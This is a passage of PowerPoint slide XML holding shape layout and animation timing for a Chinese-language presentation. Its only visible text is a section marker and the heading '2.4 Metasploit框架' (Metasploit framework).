        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
